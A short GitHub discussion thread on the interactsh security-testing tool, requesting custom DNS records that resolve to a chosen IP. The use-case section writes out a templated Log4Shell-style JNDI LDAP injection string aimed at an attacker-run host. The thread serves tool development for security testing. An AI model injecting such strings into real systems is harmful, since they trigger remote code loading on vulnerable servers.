### DISCUSSION TITLE
Accept custom DNS records pointing to a different ip

### DISCUSSION THREAD

**Discussion by brenocss** [projectdiscovery/interactsh#315] [Ideas]
### Please describe your feature request:

Another set of custom DNS Records like `aws.interactserver` but pointing to a custom IP
```
ip-8.8.8.8.{{interactid}}.{{interactserver}}
```

### Describe the use case of this feature:

An use case is `jndi:ldap://ip-{{ldapserverip}}.{{interactid}}.{{interactserver}}` or to combine it with a simple http server to handle different protocols `ip-{{simplehttpserverip}}.{{interactid}}.{{interactserver}}`

**Comment by MetzinAround** [comment]
@ehsandeep another older request. I'm just checking to see if this something that's already been addressed in a previous update or if we'd like to close this.

**Reply by brenocss** [reply]
https://github.com/projectdiscovery/interactsh/issues/383

**Comment by dogancanbakir** [comment]
This discussion closed automatically due to inactivity. Feel free to reopen or start new if still relevant.
